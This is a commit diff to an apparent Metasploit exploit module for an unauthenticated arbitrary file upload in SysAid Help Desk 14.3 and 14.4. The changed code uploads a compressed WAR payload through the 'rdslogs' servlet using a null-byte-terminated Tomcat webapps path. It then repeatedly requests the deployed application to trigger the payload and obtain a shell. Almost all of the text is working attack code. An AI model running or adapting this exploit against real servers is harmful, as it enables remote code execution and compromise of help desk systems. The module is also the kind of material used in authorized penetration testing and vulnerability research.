Fix paths for windows and cleanup

jvazquez-r7 · jvazquez-r7 · commit 57c4a3387b4a · 2015-07-17T12:09:18.000-05:00
diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'SysAid Help Desk rdslogs Arbitrary File Upload',
+      'Name'        => 'SysAid Help Desk 'rdslogs' Arbitrary File Upload',
       'Description' => %q{
         This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
         The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
@@ -62,14 +62,16 @@ def initialize(info = {})
   def check
     servlet_path = 'rdslogs'
     bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+
     res = send_request_cgi({
       'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
       'method' => 'POST',
       'vars_get' => {
         'rdsName' => bogus_file
       }
     })
-    if res and res.code == 200
+
+    if res && res.code == 200
       return Exploit::CheckCode::Detected
     end
   end
@@ -103,24 +105,31 @@ def exploit
       'data' => Zlib::Deflate.deflate(war_payload),
       'ctype' => 'application/octet-stream',
       'vars_get' => {
-        'rdsName' => tomcat_path + app_base + ".war" + "\x00"
+        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
       }
     })
 
     # The server either returns a 200 OK when the upload is successful.
-    if res and (res.code == 200)
-      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
-      " seconds for deployment")
-      register_files_for_cleanup("webapps/" + app_base + ".war")
-      sleep(datastore['SLEEP'])
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
+      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
     else
-      fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
+      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
     end
 
-    print_status("#{peer} - Executing payload, wait for session...")
-    send_request_cgi({
-      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
-      'method' => 'GET'
-    })
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
   end
 end
